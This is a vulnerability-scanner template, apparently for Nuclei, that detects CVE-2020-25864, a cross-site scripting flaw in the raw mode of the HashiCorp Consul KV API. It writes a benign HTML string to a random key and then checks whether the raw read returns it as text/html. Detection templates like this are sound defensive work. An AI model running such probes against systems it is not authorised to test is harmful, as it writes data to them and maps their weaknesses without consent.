id: CVE-2020-25864
info:
  name: HashiCorp Consul and Consul Enterprise up to version 1.9.4 key-value (KV) raw mode is vulnerable to cross-site scripting
  severity: medium
  author: c-sh0
  reference:
    - https://discuss.hashicorp.com/t/hcsec-2021-07-consul-api-kv-endpoint-vulnerable-to-cross-site-scripting/23368
    - https://nvd.nist.gov/vuln/detail/CVE-2020-25864
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.10
    cve-id: CVE-2020-25864
    cwe-id: CWE-79
  tags: cve,cve2020,consul,xss

requests:
  - raw:
      - |
        PUT /v1/kv/{{randstr}} HTTP/1.1
        Host: {{Hostname}}

        <!DOCTYPE html>

      - |
        GET {{BaseURL}}/v1/kv/{{randstr}}%3Fraw HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "Content-Type: text/html"

      - type: word
        part: header
        words:
          - "X-Consul-Index:"

